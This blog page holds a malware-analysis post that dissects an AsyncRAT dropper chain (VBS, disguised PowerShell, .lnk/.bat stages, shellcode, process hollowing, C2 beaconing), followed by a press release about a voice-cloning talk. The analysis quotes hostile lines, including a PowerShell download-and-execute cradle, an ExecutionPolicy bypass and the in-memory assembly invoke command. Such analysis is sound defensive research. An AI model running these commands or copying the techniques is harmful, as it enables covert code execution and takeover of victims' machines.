Thursday, July 15, 2021

Reverse Engineering AsyncRat Payload

As part of some current research that I am doing, I decided to analyse malicious samples in VBS and PS1 formats to understand what techniques APTs and malicious actors are using for obfuscation.  This led me to discovering AsyncRAT which I reverse engineered and wanted to share my experiences / findings with the community. 

AsyncRAT is the name of a remote access or administration tool which is used to control computers remotely. However, Chinese APT groups have been observed to be using this to perform various actions such as stealing personal information or sensitive details.

The sample that I used can be found at this link (uploaded on the 12th of July 2021):

This is a payload found in the wild that uses multiple obfuscation and file manipulation techniques as an end goal to download AsyncRAT for remote control.   

The sample being analysed contains a VBS payload, the hashes can be seen in screenshot 1.1 below:


The contents of file.vbs contain PowerShell commands that have been obfuscated through techniques such as replacing and splitting strings in addition to downloading files as shown in screenshot 1.2.



The VBS payload executes through Wscript the command “powershell -Command (New-Object Net.WebClient.DownloadString('''')| IEX” , which will download the contents of the specified URL and execute them in memory.

By browsing to this URL, you get redirected to which is supposed to be a JPG image but it is not loading as shown in screenshot 1.3.


By downloading and inspecting the “picture” we realise it is PowerShell code (shown in 1.4).


The PowerShell that is executed in memory downloads multiple files, replaces and concatenates strings together and performs execution in memory.

In the beginning of the script a number of directories are created recursively in this location C:\ProgramData\Microsoft Arts\Start , as shown in the first highlight of screenshot 1.5.

Further in the script 3 actions are performed where it sets 3 locations

  • C:\ProgramData\Microsoft Arts\Start\
  • C:\Users\Public\
  • C:\Users\Public\

Obfuscated by replacing random strings between those location paths in the second highlight of 1.5.

Next the script downloads 3 files respectively in the above-mentioned path locations as a .lnk , .bat and .ps1 and executes the .lnk file.


The .lnk file is a shortcut that will execute the .bat file from the second location in 1.6.


The .bat file executes mshta command with parameters in the command line as vbscript:Execute, to execute through Wscript a PowerShell command in screenshot 1.7.


The PowerShell command de-obfuscated executes the powershell .ps1 file downloaded earlier with the command line parameter of bypassing the ExecutionPolicy for scripts.

powershell -ExecutionPolicyBypass C:\Users\Public\MIfat7uauRiR3nHRG9cv.ps1

The .ps1 script contains a short sleep command, 2 sets of shellcode and execution through assembly in the highlights of screenshot 1.8.


Each shellcode is obfuscated with a certain pattern that gets replaced with 0, by using find & replace, we get the original shellcodes. The shellcodes are strings, hence the function where they are called to be converted as bytes.

After they are converted as bytes, they are saved in Byte variables to be used further in the script.

Peculiar note here, it seems like the variable H5 is defined twice with the exact same payload, which is weird since it changes nothing (see 1.9).

In addition to all of the above, there is the execution of assembly in the last line by using the shellcodes and the variable called ali which sets as a string the aspnet_compiler.exe from the .NET framework.

Let’s try to obtain the binaries from those shellcodes, by saving them to a file after they are converted to bytes and remove the last line to avoid becoming a victim.


By obtaining the files, we perform some initial analysis on them:


We will return back to the .ps1 script soon since the last line executes those 2 binaries, but we need to realise what is happening, H5 is the one that gets loaded for assembly execution.

By loading the H5 payload in ILSpy we are presented with the below:


Instantly from the set of WINAPI calls being executed in screenshot 1.11, we realise that this is Process Hollowing injection, which makes perfect sense since the last line uses the aspnet_compiler.exe to execute this attack and instead executes the H6 binary, which is the actual malware.

The last command is:

[Reflection.Assembly]::Load($H5).GetType('VNPT.B').GetMethod('NET').Invoke($null,[object[]] ($ali,$H6))   

The H5 binary is loaded in memory and executes the function NET of VPNT.B with parameters aspnet_compiler.exe and the H6 binary as shown in screenshot 1.12.


Next, let’s have a look at what the actual malware can do.

The H6 binary is obfuscated and uses encryption through a key, has multiple evasion features against debugging, VMs (shown in screenshot 1.13), performs recon of the hosts for its hostname, AV product (shown in screenshot 1.14) etc.



Below you can see some of its features as shown in screenshot 1.15, as well as persistence through schedule tasks on logon, by executing a .bat file as shown in screenshot 1.16.


The malware tries to reach back to the C2 domain on port 6666 but also tries to reach domain possibly for trying to look legitimate as is observed in screenshot 1.17.


In conclusion, according to public resources the H6 binary is AsyncRat. 

- Blog post by Thanasis(trickster0) of Telspace Systems

Thursday, April 1, 2021

Telspace Systems Security Analyst Speaks about “Voice Cloning” Attacks

Amy Manià to Appear at The Boston Security Meetup in April 2021


SOUTH AFRICA, JOHANNESBURG – March 17 2021 – Telspace Systemsa provider of vendor-independent Information / Cyber security solutions for the public and private sectors across a broad array of industries, both local and international, announces today that one of its OSCP Certified Security Analysts, Amy Manià, will be speaking on the subject of Deep Fake and Voice Cloning at the prestigious Boston Security Meeting in Cambridge, MA, in mid-April (date not yet finalised). The Meetup is a self-described “safe place” for InfoSec people to come meet like-minded people, share “cool ideas,” and discuss real issues.


The Boston area has one of the most diverse information security ecosystems in the world and the Meetup will serve as a springboard to further shine a spotlight on Ms. Manià’s industry-leading research and insights to help prevent businesses from falling victim to cyber-attacks, deep fakes, and how to keep sensitive information safe. 


“Telspace underscores its commitment to protecting our customer’s financial and customer data,” states Dino Covotsos, Founder and CEO of Telspace Systems. “We see prevention as a vital aspect including educating the public, training security analysts, and helping customers get out ahead of the latest attacker tactics, techniques and procedures (TTPs). “


“When watching Deep Fake videos, I quickly realized that the software capabilities of manipulating visual material seemed to be far ahead of the audio,” states Amy Manià. “That is how I began to wonder about the possibilities of cloning a voice. In 2019, I was able to fool my father and a longtime friend using a software-generated version of my own voice.”


Ms. Manià’s body of research, entitled "Put Words In My Mouth" may be explored at This links to one of her podcast appearances, a whitepaper, and recorded conference talks.


To learn more about Telspace Systems, please visit


# # #

About Telspace Systems

Since 2002, Telspace Systems, headquartered in South Africa, has provided information / cyber security solutions for the public and private sectors both locally and internationally. Telspace focuses on vendor-independent reporting methodologies and serves a broad array of industries, including governmental, financial services, telecommunications, petroleum, logistics, entertainment, transportation, legal, human resource, and ISP’s. To learn more, please visit Telspace Systems and follow us on LinkedInFacebook, and Twitter.

Media Contact for Telspace Systems:

Media Team

Tel: +27 10 590 6163